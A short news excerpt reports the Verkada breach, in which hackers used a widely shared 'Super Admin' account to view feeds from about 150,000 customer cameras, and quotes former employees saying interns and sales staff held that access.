Verkada was breached on Monday, when hackers gained access to what’s known as a “Super Admin” account that allowed them to see all of the live feeds and archived videos of Verkada’s customers, Bloomberg reported. With access to 150,000 cameras, the hackers were able to see inside Tesla Inc., as well as watch police interviews and witness hospital employees tackling a patient.
The use of Super Admin accounts within Verkada was so widespread that it extended even to sales staff and interns, two of the employees said. “We literally had 20-year-old interns that had access to over 100,000 cameras and could view all of their feeds globally,” said one former senior-level employee, who asked not to be identified discussing private information.